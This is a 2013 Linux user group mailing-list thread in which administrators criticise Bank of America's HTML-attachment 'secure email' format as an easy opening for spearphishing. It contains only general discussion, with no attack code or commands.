The reply from the customer support is “Currently, our system is set to send the remittances in the secure format. The only other option would be for us to change the format to non-secure, this way the email won’t contain any html files.” This brings to mind a tagline that used to appear in the ASR newsgroup … "I would like to shake the hand of the man who first decided that e-mail clients should slice, dice and run arbitrary programs. Then I'd like to stir, blend and puree his hand." ROT-13 would be a lot less dangerous and probably more secure - "V jbhyq yvxr gb funxr gur unaq bs gur zna jub svefg qrpvqrq gung r-znvy pyvragf fubhyq fyvpr, qvpr naq eha neovgenel cebtenzf. Gura V'q yvxr gb fgve, oyraq naq cherr uvf unaq." From: General [mailto:[email protected]] On Behalf Of Shannon Roddy Sent: Wednesday, December 04, 2013 1:33 PM To: [email protected] Subject: Re: [brlug-general] Spearfishing It appears to me to be Cisco IronPort. http://www.networkworld.com/community/node/19588 Yuck. On Wed, Dec 4, 2013 at 1:40 PM, Jarred White <[email protected]> wrote: It looks to be legit, but what an awful freaking idea BofA.
http://securemsg.bankofamerica.com/Secure_Email_Recipient_Guide_en.pdf On Wed, Dec 4, 2013 at 1:32 PM, Keith Stokes <[email protected]> wrote: Yes, unfortunately it is this easy. On Dec 4, 2013, at 12:21 PM, Edmund Cramp <[email protected]> wrote: A user received an email that purports to come from one of our customers with the instructions: "Click the securedoc.html attachment to open (view) the secure message. For best results, save the file first and open it from the saved location using a Web browser." My email system, very sensibly stripped and quarantined the file, and stored it with a couple of hundred of assorted New Order.zip and payroll report.xls files in the quarantine directory. Opening the file with notepad shows it to be mostly javascript with various references that make it appear to come from the Bank of America. My immediate reaction was unprintable but hell, assuming that it's "real" and that's not certain yet, these people want me to let users open any HTML web page that floats into their inbox? This has got to be a gift from the gods if you are up to mischief - just email everyone a securedoc.html file and they will open it and enter their password ... which javascript (love that stuff) will promptly send to the web site of your choice. Spearfishing is this easy? Edmund Cramp - google.com/+edmundcramp -- I am a drinker with writing problems. Brendan Behan _______________________________________________ General mailing list [email protected] http://brlug.net/mailman/listinfo/general_brlug.net --- Keith Stokes _______________________________________________ General mailing list [email protected] http://brlug.net/mailman/listinfo/general_brlug.net -- ~Running amok on technology with no apologies _______________________________________________ General mailing list [email protected] http://brlug.net/mailman/listinfo/general_brlug.net
_______________________________________________ General mailing list [email protected] http://brlug.net/mailman/listinfo/general_brlug.net
